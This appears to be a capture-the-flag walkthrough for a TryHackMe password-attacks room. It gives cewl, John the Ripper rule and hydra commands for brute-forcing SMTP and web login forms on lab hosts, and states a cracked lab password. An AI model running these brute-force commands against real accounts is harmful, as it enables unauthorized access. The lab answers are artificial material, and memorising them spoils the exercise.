# Password Attacks **Room Link:** ## Deploy the VM Creating a wordlist from this site as recommend in the room. **Kali** ``` cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/ ``` ## Offline Attacks **In this question, you need to generate a rule-based dictionary from the wordlist clinic.lst in the previous task. email: against 10.10.131.68:25 (SMTP).** **What is the password? Note that the password format is as follows: \[symbol]\[dictionary word]\[0-9]\[0-9].** #### **john.conf** ``` [List.Rules:THM-Password-Attacks] Az"[0-9][0-9]" ^[!@#$] ``` **Kali** ``` john --wordlist=clinic.lst --rules=THM-Password-Attacks --stdout > dict.lst hydra -l pittman@clinic.thmredteam.com -P dict.lst smtp://$VICTIM:25 -v ``` Answer is !multidisciplinary00 **Perform a brute-forcing attack against the phillips account for the login page at using hydra? What is the flag?**

**Kali** ``` hydra -l phillips -P ../dict.lst 10.10.130.199 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f ```

\ **Perform a rule-based password attack to gain access to the burgess account. Find the flag at the following website: . What is the flag?** **Note: use the clinic.lst dictionary in generating and expanding the wordlist!** **Kali** ``` john --wordlist=clinic.lst --rules=Single-Extra --stdout > dict2.lst ./hydra -l burgess -P dict2.lst 10.10.130.199 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f ```